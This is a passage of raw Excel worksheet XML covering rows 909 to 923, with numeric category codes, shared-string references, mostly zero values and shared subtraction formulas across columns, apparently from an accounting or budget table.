      </c>
      <c r="AM909" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN909" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO909" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP909" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="910" ht="18" customHeight="1" spans="1:42">
      <c r="A910" s="10"/>
      <c r="B910" s="10"/>
      <c r="C910" s="28"/>
      <c r="D910" s="10">
        <v>2130309</v>
      </c>
      <c r="E910" s="16" t="s">
        <v>3689</v>
      </c>
      <c r="F910" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G910" s="17"/>
      <c r="H910" s="17"/>
      <c r="I910" s="17"/>
      <c r="J910" s="17"/>
      <c r="K910" s="17"/>
      <c r="L910" s="17"/>
      <c r="M910" s="17"/>
      <c r="N910" s="17"/>
      <c r="O910" s="17"/>
      <c r="P910" s="17"/>
      <c r="Q910" s="17"/>
      <c r="R910" s="17"/>
      <c r="S910" s="17"/>
      <c r="T910" s="17"/>
      <c r="U910" s="17"/>
      <c r="V910" s="17"/>
      <c r="W910" s="17"/>
      <c r="X910" s="17"/>
      <c r="Y910" s="17"/>
      <c r="Z910" s="17"/>
      <c r="AA910" s="17"/>
      <c r="AB910" s="17"/>
      <c r="AC910" s="17"/>
      <c r="AD910" s="17"/>
      <c r="AE910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP910" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="911" ht="18" customHeight="1" spans="1:42">
      <c r="A911" s="10"/>
      <c r="B911" s="10"/>
      <c r="C911" s="28"/>
      <c r="D911" s="10">
        <v>2130310</v>
      </c>
      <c r="E911" s="16" t="s">
        <v>3690</v>
      </c>
      <c r="F911" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G911" s="17"/>
      <c r="H911" s="17"/>
      <c r="I911" s="17"/>
      <c r="J911" s="17"/>
      <c r="K911" s="17"/>
      <c r="L911" s="17"/>
      <c r="M911" s="17"/>
      <c r="N911" s="17"/>
      <c r="O911" s="17"/>
      <c r="P911" s="17"/>
      <c r="Q911" s="17"/>
      <c r="R911" s="17"/>
      <c r="S911" s="17"/>
      <c r="T911" s="17"/>
      <c r="U911" s="17"/>
      <c r="V911" s="17"/>
      <c r="W911" s="17"/>
      <c r="X911" s="17"/>
      <c r="Y911" s="17"/>
      <c r="Z911" s="17"/>
      <c r="AA911" s="17"/>
      <c r="AB911" s="17"/>
      <c r="AC911" s="17"/>
      <c r="AD911" s="17"/>
      <c r="AE911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP911" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="912" ht="18" customHeight="1" spans="1:42">
      <c r="A912" s="10"/>
      <c r="B912" s="10"/>
      <c r="C912" s="28"/>
      <c r="D912" s="10">
        <v>2130311</v>
      </c>
      <c r="E912" s="16" t="s">
        <v>3691</v>
      </c>
      <c r="F912" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G912" s="17"/>
      <c r="H912" s="17"/>
      <c r="I912" s="17"/>
      <c r="J912" s="17"/>
      <c r="K912" s="17"/>
      <c r="L912" s="17"/>
      <c r="M912" s="17"/>
      <c r="N912" s="17"/>
      <c r="O912" s="17"/>
      <c r="P912" s="17"/>
      <c r="Q912" s="17"/>
      <c r="R912" s="17"/>
      <c r="S912" s="17"/>
      <c r="T912" s="17"/>
      <c r="U912" s="17"/>
      <c r="V912" s="17"/>
      <c r="W912" s="17"/>
      <c r="X912" s="17"/>
      <c r="Y912" s="17"/>
      <c r="Z912" s="17"/>
      <c r="AA912" s="17"/>
      <c r="AB912" s="17"/>
      <c r="AC912" s="17"/>
      <c r="AD912" s="17"/>
      <c r="AE912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP912" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="913" ht="18" customHeight="1" spans="1:42">
      <c r="A913" s="10"/>
      <c r="B913" s="10"/>
      <c r="C913" s="28"/>
      <c r="D913" s="10">
        <v>2130312</v>
      </c>
      <c r="E913" s="16" t="s">
        <v>3692</v>
      </c>
      <c r="F913" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G913" s="17"/>
      <c r="H913" s="17"/>
      <c r="I913" s="17"/>
      <c r="J913" s="17"/>
      <c r="K913" s="17"/>
      <c r="L913" s="17"/>
      <c r="M913" s="17"/>
      <c r="N913" s="17"/>
      <c r="O913" s="17"/>
      <c r="P913" s="17"/>
      <c r="Q913" s="17"/>
      <c r="R913" s="17"/>
      <c r="S913" s="17"/>
      <c r="T913" s="17"/>
      <c r="U913" s="17"/>
      <c r="V913" s="17"/>
      <c r="W913" s="17"/>
      <c r="X913" s="17"/>
      <c r="Y913" s="17"/>
      <c r="Z913" s="17"/>
      <c r="AA913" s="17"/>
      <c r="AB913" s="17"/>
      <c r="AC913" s="17"/>
      <c r="AD913" s="17"/>
      <c r="AE913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP913" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="914" ht="18" customHeight="1" spans="1:42">
      <c r="A914" s="10"/>
      <c r="B914" s="10"/>
      <c r="C914" s="28"/>
      <c r="D914" s="10">
        <v>2130313</v>
      </c>
      <c r="E914" s="16" t="s">
        <v>3693</v>
      </c>
      <c r="F914" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G914" s="17"/>
      <c r="H914" s="17"/>
      <c r="I914" s="17"/>
      <c r="J914" s="17"/>
      <c r="K914" s="17"/>
      <c r="L914" s="17"/>
      <c r="M914" s="17"/>
      <c r="N914" s="17"/>
      <c r="O914" s="17"/>
      <c r="P914" s="17"/>
      <c r="Q914" s="17"/>
      <c r="R914" s="17"/>
      <c r="S914" s="17"/>
      <c r="T914" s="17"/>
      <c r="U914" s="17"/>
      <c r="V914" s="17"/>
      <c r="W914" s="17"/>
      <c r="X914" s="17"/>
      <c r="Y914" s="17"/>
      <c r="Z914" s="17"/>
      <c r="AA914" s="17"/>
      <c r="AB914" s="17"/>
      <c r="AC914" s="17"/>
      <c r="AD914" s="17"/>
      <c r="AE914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP914" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="915" ht="18" customHeight="1" spans="1:42">
      <c r="A915" s="10"/>
      <c r="B915" s="10"/>
      <c r="C915" s="28"/>
      <c r="D915" s="10">
        <v>2130314</v>
      </c>
      <c r="E915" s="16" t="s">
        <v>3694</v>
      </c>
      <c r="F915" s="14">
        <f t="shared" si="449"/>
        <v>46</v>
      </c>
      <c r="G915" s="17">
        <v>12</v>
      </c>
      <c r="H915" s="17"/>
      <c r="I915" s="17"/>
      <c r="J915" s="17"/>
      <c r="K915" s="17">
        <v>10</v>
      </c>
      <c r="L915" s="17">
        <v>36</v>
      </c>
      <c r="M915" s="17"/>
      <c r="N915" s="17"/>
      <c r="O915" s="17"/>
      <c r="P915" s="17"/>
      <c r="Q915" s="17"/>
      <c r="R915" s="17"/>
      <c r="S915" s="17">
        <v>4</v>
      </c>
      <c r="T915" s="17"/>
      <c r="U915" s="17"/>
      <c r="V915" s="17"/>
      <c r="W915" s="17">
        <v>10</v>
      </c>
      <c r="X915" s="17">
        <v>36</v>
      </c>
      <c r="Y915" s="17"/>
      <c r="Z915" s="17"/>
      <c r="AA915" s="17"/>
      <c r="AB915" s="17"/>
      <c r="AC915" s="17"/>
      <c r="AD915" s="17"/>
      <c r="AE915" s="17">
        <f t="shared" si="450"/>
        <v>8</v>
      </c>
      <c r="AF915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP915" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="916" ht="18" customHeight="1" spans="1:42">
      <c r="A916" s="10"/>
      <c r="B916" s="10"/>
      <c r="C916" s="28"/>
      <c r="D916" s="10">
        <v>2130315</v>
      </c>
      <c r="E916" s="16" t="s">
        <v>3695</v>
      </c>
      <c r="F916" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G916" s="17"/>
      <c r="H916" s="17"/>
      <c r="I916" s="17"/>
      <c r="J916" s="17"/>
      <c r="K916" s="17"/>
      <c r="L916" s="17"/>
      <c r="M916" s="17"/>
      <c r="N916" s="17"/>
      <c r="O916" s="17"/>
      <c r="P916" s="17"/>
      <c r="Q916" s="17"/>
      <c r="R916" s="17"/>
      <c r="S916" s="17"/>
      <c r="T916" s="17"/>
      <c r="U916" s="17"/>
      <c r="V916" s="17"/>
      <c r="W916" s="17"/>
      <c r="X916" s="17"/>
      <c r="Y916" s="17"/>
      <c r="Z916" s="17"/>
      <c r="AA916" s="17"/>
      <c r="AB916" s="17"/>
      <c r="AC916" s="17"/>
      <c r="AD916" s="17"/>
      <c r="AE916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP916" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="917" ht="18" customHeight="1" spans="1:42">
      <c r="A917" s="10"/>
      <c r="B917" s="10"/>
      <c r="C917" s="28"/>
      <c r="D917" s="10">
        <v>2130316</v>
      </c>
      <c r="E917" s="16" t="s">
        <v>3696</v>
      </c>
      <c r="F917" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G917" s="17"/>
      <c r="H917" s="17"/>
      <c r="I917" s="17"/>
      <c r="J917" s="17"/>
      <c r="K917" s="17"/>
      <c r="L917" s="17"/>
      <c r="M917" s="17"/>
      <c r="N917" s="17"/>
      <c r="O917" s="17"/>
      <c r="P917" s="17"/>
      <c r="Q917" s="17"/>
      <c r="R917" s="17"/>
      <c r="S917" s="17"/>
      <c r="T917" s="17"/>
      <c r="U917" s="17"/>
      <c r="V917" s="17"/>
      <c r="W917" s="17"/>
      <c r="X917" s="17"/>
      <c r="Y917" s="17"/>
      <c r="Z917" s="17"/>
      <c r="AA917" s="17"/>
      <c r="AB917" s="17"/>
      <c r="AC917" s="17"/>
      <c r="AD917" s="17"/>
      <c r="AE917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP917" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="918" ht="18" customHeight="1" spans="1:42">
      <c r="A918" s="10"/>
      <c r="B918" s="10"/>
      <c r="C918" s="28"/>
      <c r="D918" s="10">
        <v>2130317</v>
      </c>
      <c r="E918" s="16" t="s">
        <v>3697</v>
      </c>
      <c r="F918" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G918" s="17"/>
      <c r="H918" s="17"/>
      <c r="I918" s="17"/>
      <c r="J918" s="17"/>
      <c r="K918" s="17"/>
      <c r="L918" s="17"/>
      <c r="M918" s="17"/>
      <c r="N918" s="17"/>
      <c r="O918" s="17"/>
      <c r="P918" s="17"/>
      <c r="Q918" s="17"/>
      <c r="R918" s="17"/>
      <c r="S918" s="17"/>
      <c r="T918" s="17"/>
      <c r="U918" s="17"/>
      <c r="V918" s="17"/>
      <c r="W918" s="17"/>
      <c r="X918" s="17"/>
      <c r="Y918" s="17"/>
      <c r="Z918" s="17"/>
      <c r="AA918" s="17"/>
      <c r="AB918" s="17"/>
      <c r="AC918" s="17"/>
      <c r="AD918" s="17"/>
      <c r="AE918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP918" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="919" ht="18" customHeight="1" spans="1:42">
      <c r="A919" s="10"/>
      <c r="B919" s="10"/>
      <c r="C919" s="28"/>
      <c r="D919" s="10">
        <v>2130318</v>
      </c>
      <c r="E919" s="16" t="s">
        <v>3698</v>
      </c>
      <c r="F919" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G919" s="17"/>
      <c r="H919" s="17"/>
      <c r="I919" s="17"/>
      <c r="J919" s="17"/>
      <c r="K919" s="17"/>
      <c r="L919" s="17"/>
      <c r="M919" s="17"/>
      <c r="N919" s="17"/>
      <c r="O919" s="17"/>
      <c r="P919" s="17"/>
      <c r="Q919" s="17"/>
      <c r="R919" s="17"/>
      <c r="S919" s="17"/>
      <c r="T919" s="17"/>
      <c r="U919" s="17"/>
      <c r="V919" s="17"/>
      <c r="W919" s="17"/>
      <c r="X919" s="17"/>
      <c r="Y919" s="17"/>
      <c r="Z919" s="17"/>
      <c r="AA919" s="17"/>
      <c r="AB919" s="17"/>
      <c r="AC919" s="17"/>
      <c r="AD919" s="17"/>
      <c r="AE919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP919" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="920" ht="18" customHeight="1" spans="1:42">
      <c r="A920" s="10"/>
      <c r="B920" s="10"/>
      <c r="C920" s="28"/>
      <c r="D920" s="10">
        <v>2130319</v>
      </c>
      <c r="E920" s="16" t="s">
        <v>3699</v>
      </c>
      <c r="F920" s="14">
        <f t="shared" si="449"/>
        <v>17</v>
      </c>
      <c r="G920" s="17"/>
      <c r="H920" s="17"/>
      <c r="I920" s="17"/>
      <c r="J920" s="17"/>
      <c r="K920" s="17"/>
      <c r="L920" s="17">
        <v>17</v>
      </c>
      <c r="M920" s="17"/>
      <c r="N920" s="17"/>
      <c r="O920" s="17"/>
      <c r="P920" s="17"/>
      <c r="Q920" s="17"/>
      <c r="R920" s="17"/>
      <c r="S920" s="17"/>
      <c r="T920" s="17"/>
      <c r="U920" s="17"/>
      <c r="V920" s="17"/>
      <c r="W920" s="17"/>
      <c r="X920" s="17">
        <v>9</v>
      </c>
      <c r="Y920" s="17"/>
      <c r="Z920" s="17"/>
      <c r="AA920" s="17"/>
      <c r="AB920" s="17"/>
      <c r="AC920" s="17"/>
      <c r="AD920" s="17"/>
      <c r="AE920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ920" s="17">
        <f t="shared" si="450"/>
        <v>8</v>
      </c>
      <c r="AK920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP920" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="921" ht="18" customHeight="1" spans="1:42">
      <c r="A921" s="10"/>
      <c r="B921" s="10"/>
      <c r="C921" s="28"/>
      <c r="D921" s="10">
        <v>2130321</v>
      </c>
      <c r="E921" s="16" t="s">
        <v>3700</v>
      </c>
      <c r="F921" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G921" s="17"/>
      <c r="H921" s="17"/>
      <c r="I921" s="17"/>
      <c r="J921" s="17"/>
      <c r="K921" s="17"/>
      <c r="L921" s="17"/>
      <c r="M921" s="17"/>
      <c r="N921" s="17"/>
      <c r="O921" s="17"/>
      <c r="P921" s="17"/>
      <c r="Q921" s="17"/>
      <c r="R921" s="17"/>
      <c r="S921" s="17"/>
      <c r="T921" s="17"/>
      <c r="U921" s="17"/>
      <c r="V921" s="17"/>
      <c r="W921" s="17"/>
      <c r="X921" s="17"/>
      <c r="Y921" s="17"/>
      <c r="Z921" s="17"/>
      <c r="AA921" s="17"/>
      <c r="AB921" s="17"/>
      <c r="AC921" s="17"/>
      <c r="AD921" s="17"/>
      <c r="AE921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP921" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="922" ht="18" customHeight="1" spans="1:42">
      <c r="A922" s="10"/>
      <c r="B922" s="10"/>
      <c r="C922" s="28"/>
      <c r="D922" s="10">
        <v>2130322</v>
      </c>
      <c r="E922" s="16" t="s">
        <v>3701</v>
      </c>
      <c r="F922" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G922" s="17"/>
      <c r="H922" s="17"/>
      <c r="I922" s="17"/>
      <c r="J922" s="17"/>
      <c r="K922" s="17"/>
      <c r="L922" s="17"/>
      <c r="M922" s="17"/>
      <c r="N922" s="17"/>
      <c r="O922" s="17"/>
      <c r="P922" s="17"/>
      <c r="Q922" s="17"/>
      <c r="R922" s="17"/>
      <c r="S922" s="17"/>
      <c r="T922" s="17"/>
      <c r="U922" s="17"/>
      <c r="V922" s="17"/>
      <c r="W922" s="17"/>
      <c r="X922" s="17"/>
      <c r="Y922" s="17"/>
      <c r="Z922" s="17"/>
      <c r="AA922" s="17"/>
      <c r="AB922" s="17"/>
      <c r="AC922" s="17"/>
      <c r="AD922" s="17"/>
      <c r="AE922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AI922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AJ922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AK922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AL922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AM922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AN922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AO922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AP922" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
    </row>
    <row r="923" ht="18" customHeight="1" spans="1:42">
      <c r="A923" s="10"/>
      <c r="B923" s="10"/>
      <c r="C923" s="28"/>
      <c r="D923" s="10">
        <v>2130333</v>
      </c>
      <c r="E923" s="16" t="s">
        <v>3675</v>
      </c>
      <c r="F923" s="14">
        <f t="shared" si="449"/>
        <v>0</v>
      </c>
      <c r="G923" s="17"/>
      <c r="H923" s="17"/>
      <c r="I923" s="17"/>
      <c r="J923" s="17"/>
      <c r="K923" s="17"/>
      <c r="L923" s="17"/>
      <c r="M923" s="17"/>
      <c r="N923" s="17"/>
      <c r="O923" s="17"/>
      <c r="P923" s="17"/>
      <c r="Q923" s="17"/>
      <c r="R923" s="17"/>
      <c r="S923" s="17"/>
      <c r="T923" s="17"/>
      <c r="U923" s="17"/>
      <c r="V923" s="17"/>
      <c r="W923" s="17"/>
      <c r="X923" s="17"/>
      <c r="Y923" s="17"/>
      <c r="Z923" s="17"/>
      <c r="AA923" s="17"/>
      <c r="AB923" s="17"/>
      <c r="AC923" s="17"/>
      <c r="AD923" s="17"/>
      <c r="AE923" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AF923" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AG923" s="17">
        <f t="shared" si="450"/>
        <v>0</v>
      </c>
      <c r="AH923" s="17">
        <f t="shared" ref="AH923:AP928" si="451">J923-V923</f>
        <v>0</v>
      </c>
      <c r="AI923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AJ923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AK923" s="17">
        <f t="shared" si="451"/>
        <v>0</v>
      </c>
      <c r="AL923" s="17">
        <f t="shared" si="451"/>
